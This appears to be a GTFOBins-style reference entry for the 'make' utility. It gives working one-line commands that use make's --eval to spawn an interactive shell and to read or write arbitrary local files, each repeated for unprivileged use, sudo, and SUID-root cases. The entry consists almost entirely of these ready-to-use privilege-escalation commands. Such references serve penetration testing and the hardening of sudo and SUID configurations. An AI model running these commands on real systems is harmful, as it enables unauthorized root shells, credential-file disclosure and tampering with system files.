This executable can spawn an interactive system shell.
This function can be performed by any unprivileged user.
make --eval='$(shell /bin/sh 1>&0)' .
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
make --eval='$(shell /bin/sh 1>&0)' .
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
make --eval='$(shell /bin/sh 1>&0)' .
This executable can write data to local files.
This function can be performed by any unprivileged user.
make -s --eval='$(file >/path/to/output-file,DATA)' .
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
make -s --eval='$(file >/path/to/output-file,DATA)' .
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
make -s --eval='$(file >/path/to/output-file,DATA)' .
This executable can read data from local files.
This function can be performed by any unprivileged user.
make -s --eval='$(file >/dev/stdout,$(file </path/to/input-file))' .
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
make -s --eval='$(file >/dev/stdout,$(file </path/to/input-file))' .
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
make -s --eval='$(file >/dev/stdout,$(file </path/to/input-file))' .